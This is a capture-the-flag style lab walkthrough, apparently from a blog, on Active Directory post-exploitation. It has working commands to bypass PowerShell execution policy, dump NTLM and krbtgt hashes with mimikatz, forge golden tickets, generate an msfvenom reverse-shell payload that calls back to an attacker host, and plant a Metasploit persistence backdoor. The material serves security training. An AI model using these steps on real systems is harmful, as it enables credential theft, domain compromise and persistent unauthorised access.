Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, Powerview, and msfvenom.
Introduction:
This room teaches you how to enumerate inside an active directory environment after you have gained initial access. It covers everything from post-exploitation enumeration with Powerview and bloodhound, dumping hashes and golden ticket attacks with mimikatz, and basic information gathering using windows server tools and logs.
Enumeration w/ Powerview:
In this task, we are going to learn how to use PowerView.ps1 to enumerate the target machine.
Ssh into the target machine.
Step 1:
You need to start the PowerShell with execution policy bypass. So you can easily run scripts.
You can easily bypass this with the help of “-ep” tag.
powershell -ep bypassif you want to learn more about PowerShell execution policies you can watch this great video by JOHN HAMMOND.
Execute the PowerShell script in the downloads directory.
Now you can run commands to enumerate the users on the machine.
There is a great cheatsheet to help you enumerate easily.
Enumerate the domain users by running “Get-NetUser” command. Beware this can put out a lot of information and can be hard to parse through we can pipe the output and retrieve only things we need like “cn”, and “description”.
Kerbroastable users:
You can find the kerbroastable users by adding the “-SPN” tag.
Enumerate the domain groups:
We can enumerate the domain groups by running the “Get-NetGroup” command. This can also output a lot of information. You can just pipe the output and retrieve what is useful to you.
Woah! These are a lot of groups we can narrow down by only retrieving the ones with the word “admin” init.
Now we can move over to the next part of this room,
Enumeration w/ Bloodhound:
Bloodhound is a graphical interface that allows you to visually map out the network. This tool along with SharpHound which is similar to PowerView takes the user, groups, trusts, etc. of the network and collects them into .json files to be used inside of Bloodhound.
We'll be focusing on how to collect the .json files and how to import them into Bloodhound.
BloodHound Installation -
1.) apt-get install bloodhound
2.) neo4j console - default credentials -> neo4j:neo4j
Getting Loot Information.
First, you need to bypass the execution policy of PowerShell so you can run the scripts easily.
powershell -ep bypassAfter that run the sharphound.ps1
. .\sharphound.ps1After that, you need to invoke bloodhound to get all the information
If you are getting the incompatible collector error in bloodhound make sure to install the latest version of Sharphound.ps1 and run it.
We can see we have a loot.zip file let's transfer it to our attacking machine.
Mapping the network w/ BloodHound -
1.) bloodhound Run this on your attacker machine not the victim machine
2.) Sign In using the same credentials you set with Neo4j
After that upload the lootfile using the upload data toggle.
After that, you can analyze the output.
Off to the next part.
Dumping hashes w/ mimikatz:
Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of an active directory network
We’ll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat.
Step 1: Run mimikatz:
Step 2 :privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly
Step 3: lsadump::lsa /patch Dumps the hashes from SAM file.
Now copy those hashes and try to crack them through hashcat.
SYNTAXhashcat -m 1000 <hash> rockyou.txt
Golden Ticket Attacks w/ mimikatz:
A successful Golden Ticket attack gives the hacker access to an organization’s entire Active Directory domain.
Golden Ticket attacks take advantage of a vulnerability in the Kerberos authentication protocol, which Microsoft has been using as its default authentication protocol ever since Windows 2000.
if you want to learn more about how the Golden ticket attack works There is a great blog here.
In a summary, hackers bypass the KDC and create TGTs themselves to get access to various resources.
There are some requirements for this attack to be successful.
Fully Qualified Domain Name.
SID (Security Identifier) of the domain.
Username of the account they want to impersonate.
KRBTGT password hash.
Step 1: Dump the krbtgt Hash
We can use mimikatz to retrieve the hash and security identifier (SID) of the krbtgt account.
lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.
Take a note to bolded information in the image.
Step 2: Create a Golden Ticket:
We can easily create a golden ticket using mimikatz. A detailed walkthrough of the whole process is at
In summary, after gathering the prerequisites you need to run
kerberos::golden /user: /domain: /sid: /krbtgt: /id: command.
Note: you may need to change the “ /Krbtgt:” to “/rc4:”. if you encountered any errors follow this official guide.
Step 3: Use the Golden Ticket to access another machine:
misc::cmd - This will open a new command prompt with elevated privileges to all machines.
Access other Machines! — You will now have another command prompt with access to all other machines on the network
Unfortunately, because tryhackme does not currently support networks you will be unable to access other machines however I encourage you to add other machines to this domain controller yourself and try out these attacks.
Enumeration w/ Server Manager:
In this task, we are going to get the information using the windows inbuilt server manager.
Because servers are rarely logged on until for maintenance, you may easily enumerate them using simply built-in Windows functions such as the server manager. If you already have domain admin, you have a lot of access to the server manager in order to change trusts, add or remove users, look at groups, and this can be an entry point to find other users on the domain network with access to other networks in order to pivot to another network and continue your testing.
The only method to access the server management is to rdp into it and connect to it through a rdp connection.
In linux you can use xfreerdp to connect to the target .
xfreerdp /v:<IP-ADD> /u:Administrator /p:'P@$$W0rd'When you first launch Windows Server Manager, it will appear like this. The most intriguing tabs will be the tools and manage tabs. The tools tab contains the majority of your information, such as users, groups, trusts, and machines. The manage page will allow you to add responsibilities and features, but this will most likely be noticed by a systems administrator rather quickly.
Don’t be concerned with the AD CS, AD DS, DNS, or File and Storage Services; these are designed for active directory exploitation and aren’t really useful for post-exploitation.
Navigate to the tools tab and select the Active Directory Users and Computers.
Maintaining Access:
There are numerous methods for retaining access to a machine or network. We will cover a relatively simple method for retaining access by first configuring a meterpreter shell and then using the persistence Metasploit module to create a backdoor service in the system that will provide us with an instant meterpreter shell if the machine is ever shutdown or reset.
Other methods of sustaining access, such as sophisticated backdoors and rootkits, are also available but are outside the scope of this room.
This will take a little more manual setup than the other jobs, therefore prior knowledge of msfvenom and Metasploit is recommended.
Step 1: Generating a Payload w/ msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exethis will generate a basic windows meterpreter reverse tcp shell.
2. Transfer the payload from your attacker machine to the target machine.
You can use Certutil or Invoke-WebRequest command to receive the file.
3. use exploit/multi/handler - this will create a listener on the port that you set it on.
4. Configure our payload to be a windows meterpreter shell: set payload windows/meterpreter/reverse_tcp
5. After setting your THM IP address as your “LHOST”, start the listener with run
6. Executing the binary on the windows machine will give you a meterpreter shell back on your host — let’s return to that
7. Verify that we’ve got a meterpreter shell, where we will then backgroundit to run the persistence module.
Run the Persistence Module:
1. use exploit/windows/local/persistence this module will send a payload every 10 seconds in default however you can set this time to anything you want
2. set session 1 set the session to the session that we backgrounded in meterpreter (you can use the sessions command in Metasploit to list the active sessions)
You will lose your meterpreter session if the system is shut down or reset for any reason; however, by using the persistence module, you create a backdoor into the system that you can access at any time by using the Metasploit multi handler and setting the payload to windows/meterpreter/reverse tcp, allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.
See y’all later.
Happy Hacking!
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!
